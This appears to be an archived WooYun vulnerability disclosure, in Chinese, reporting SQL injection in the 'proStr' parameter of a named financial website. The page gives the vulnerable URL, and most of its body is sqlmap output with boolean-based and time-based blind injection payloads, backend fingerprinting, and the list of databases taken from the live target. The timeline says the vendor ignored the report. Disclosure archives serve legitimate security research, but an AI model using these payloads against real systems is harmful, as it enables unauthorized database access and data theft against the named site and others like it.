乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-18: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-05-02: 厂商已经主动忽略漏洞,细节向公众公开
金蜂财富主站sql注入漏洞一枚
http://www.jfcaifu.com/view/article-1510.html?proStr=21,22,23,20参数:proStr未过滤
GET parameter 'proStr' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 74 HTTP(s) requests:---Place: GETParameter: proStr Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: proStr=21,22,23,20) AND 3343=3343 AND (8678=8678 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: proStr=21,22,23,20) AND SLEEP(5) AND (1001=1001---[16:22:24] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, JSPback-end DBMS: MySQL 5.0.11[16:22:24] [INFO] fetching database names[16:22:24] [INFO] fetching number of databases[16:22:24] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval[16:22:24] [INFO] retrieved: 6[16:22:26] [INFO] retrieved: information_schema[16:22:59] [INFO] retrieved: bbs[16:23:05] [INFO] retrieved: bbstest[16:23:18] [INFO] retrieved: mysql[16:23:27] [INFO] retrieved: performance_schema[16:24:00] [INFO] retrieved: yinshuavailable databases [6]:[*] bbs[*] bbstest[*] information_schema[*] mysql[*] performance_schema[*] yinshu
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)